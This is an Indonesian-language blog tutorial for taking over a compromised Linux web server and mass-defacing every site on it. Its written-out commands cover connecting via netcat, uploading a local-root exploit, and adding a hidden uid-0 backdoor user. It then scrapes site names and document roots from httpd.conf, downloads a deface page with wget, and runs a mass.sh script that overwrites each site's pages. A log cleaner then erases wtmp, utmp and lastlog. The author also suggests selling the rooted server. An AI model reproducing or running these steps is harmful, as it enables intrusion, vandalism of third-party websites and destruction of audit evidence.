•  Anak baru numpang posting yah,. ok langsung aja yah ga usah pake basa basi,.
    pertama kmu backconect dlu ke shell mu,. terserah mau pke apa keq,. nc atau bind shell,. disni aku make bind shell,.
    comand2'a, lihat aja di gambar,..
    [Image: Screenshot.png]

    setelah check kernel n segala macem'a,.. kmu upload localroot yg pas sama kernel di shell mu,. trus kasih chmod 777 di tuh local,
    [Image: Screenshot-1.png]

    tggal jalanin deh local yg sdah kmu upload tadi,.
    [Image: Screenshot-2.png]
    klo berhasil ke root, mka id'a berubah, sperti gambar yg di atas,.

    tahap akhir'a,. tggal add usermu aja distu,.
    [Image: Screenshot-3.png]

    klo udah berhasil,. jadi'a kek gini
    [Image: Screenshot-4.png]

    penjelasan'a,..

    PHP Code:
    adduser -u 0 --g 0 -G 0,1,2,3,4,6,10 -M ftp-user
    adduser 
    comand untuk nambahin user-u 0 -set user jadi dngn ID nol (0root.
    -
    g 0 set initial group dengan ID nol (0root.
    -
    G 0,1,2,3,4,6,10 set additional group ke:root
    bin
    daemon
    sys
    adm
    disk
    10 
    wheel-M – ‘home directory’ tidak di create ke user.ftp-user username dri user yg mau dipke 

    sekrang apa lagi,.??
    ya terserah mau kalian apakan,. ntah itu mau di jual, mau di pke sndri, atau mau di deface,.
    klo mau di deface, kita lanjut lagi,. :D

    login di putty dan masukan ip server dan port yang mau kita mass deface,..
    [Image: 52fe6d4c3f5f4e5fa6271db.png]

    sekarang kita masuk ke "etc/httpd/conf" untuk mengambil semua nama website n user yang ada di sever.. kita masukan comand berikut :
    PHP Code:
    cd /etc/httpd/conf 

    setelah itu kita ambil semua nama web yg ada di server dan mengcopy'a di shell kita dengan nama "web.txt" (terserah sih mau pke nama apa)
    comand'a :
    PHP Code:
    cat httpd.conf grep -i ServerName > /home/NamaUser/public_html/web.txt 
    untuk NamaUser, klian bisa lihat di shell kalian masing2...

    [Image: HdghNpj.png]

    sekarang kita ambil lagi nama2 user'a, kemudian copy semua user yg ada di dalam user.txt ke notepad..
    comand'a :
    PHP Code:
    cat httpd.conf grep -i DocumentRoot > /home/NamaUser/public_html/user.txt 

    [Image: 88f8750f45984456a704565.png]

    setelah itu kita kembali ke dir root, dan buat dir baru (terserah mau pke nama dir apa, disini saya pke nama dir bie) dan kita masuk ke dir baru yg kita buat itu, dan kita download deface page kita ke dalam dir yg baru kita buat itu,..
    comand'a :
    PHP Code:
    cd /rootmkdir biecd bie
    wget http
    ://blablabla.com/deface.html 
    [Image: 0OSGSIS.png]

    ok,. kita sudah pnya deface page, sekarang kita buat file mass.sh kita dulu,..
    ganti semua tulisan "DocumentRoot" dengan "cp defacepage.html" disni yg perlu kita perhatikan, bila kita mau taruh file deface kita di index, mka kita menggunakan "cp index.html" bila gak, klian bisa mengganti'a dengan nama file yg lain,.. disini aku pke "bie.htm"
    [Image: qm0DEhe.png]

    kemudian kembali ke putty kita, ketik comand "nano mass.sh" lalu copas semua nama users yg sudah kita ganti tadi, setelah itu ketik control "o", enter, trus control "x" untuk kmbali,..
    setelah itu kita berikan perm 777 pada mass.sh kita, lalu jalankan mass.sh kita
    PHP Code:
    chmod 777 mass.sh; ./mass.sh 
    [Image: 68beffb40e24488ba47018b.png]

    yep,.. selese mass deface'a,..
    sekarang kembali ke dir root, lalu hapus dir baru yang kalian bikin tadi
    lalu jalankan log cleaner kalian, trus exit.. :)
    [Image: 1Jv4i7e.png]

    log cleaner bisa klian dapet dsini : http://pastebin.com/Csfw9BrY
    cara pke'a :
    1. Copy source log cleaner'a di notepad lalu save dengan nama remove.c trus perhatikan
    [Image: bHx73vo.png]

    Harap diingat bahwa tidak selalu file2 wtmp utmp dan lastlog berada pada posisi yang sama jadi jangan lupa cek apakah posisi file2 wtmp utmp dan lastlog sudah sesuai dengan source remove.c log'a atau belum,..
    Kamu bisa gunakan perintah untuk mencari dima posisi2 file wtmp utmp dan lastlog :
    PHP Code:
    find / -name wtmp -printfind / -name utmp -printfind / -name lastlog -printatau
    whereis wtmp
    whereis utmp
    whereis lastlog 


    Kemudian ganti posisi file2 tersebut di remove.c yg sudah kamu save di notepad tadi sesuai dengan hasil diatas,..

    2. Setelah kita rubah, upload ke server / site yg sudah kita root tadi,. saat'a kita compile,. atau bisa jga sekalian compile di desktop (bagi pengguna linux)
    PHP Code:
    gcc remove.-o remove -DGENERIC
    remove
    .cIn function `main':
    remove.c:50: warning: return type of 
    `main' is not `int'/tmp/ccZVzySI.oIn function `main':
    /tmp/ccZVzySI.o(.text+0xb4): the 
    `gets' function is dangerous and should
    not be used. 
    dan terakhir kita jalankan remove'a,. :)
    PHP Code:
    ./remove namarootuser 

    trus tggal masukin pilihan'a,.. :)
    [Image: 8CITRjF.png]

    terkhir, kita ganti semua tulisan "SeverName" dengan "http://"
    [Image: 312181284964474c9cc8a3f.png]

    Tool :
    shell yg aku pke diatas : http://pastebin.com/0N805eLE
    log cleaner : http://pastebin.com/Csfw9BrY
    NC : http://joncraton.org/media/files/nc111nt.zip
    puttty : http://portableapps.com/apps/internet/putty_portable

    Ps : Tut diatas terdiri dari 2 bagian, tapi saya jadikan satu,. jadi mohon maaf klo kepanjangan,.. :D
    untuk weduser (windows user), sama aja koq kyak di atas comand2'a,.. gak jauh beda...
    paling beda'a klo di windows pas mau gunain nc'a doank,.
    harus masuk di dir nc dlu kan bru bisa gunain bind atau mau back conect...
    dah gtu aja,.. moga berguna yah,.. :)

    credit : my best teacher Google

    0 comments

  • Copyright © 2013 - Nisekoi - All Right Reserved

    X ZoneTechno Powered by Blogger - Designed by Johanes Djogan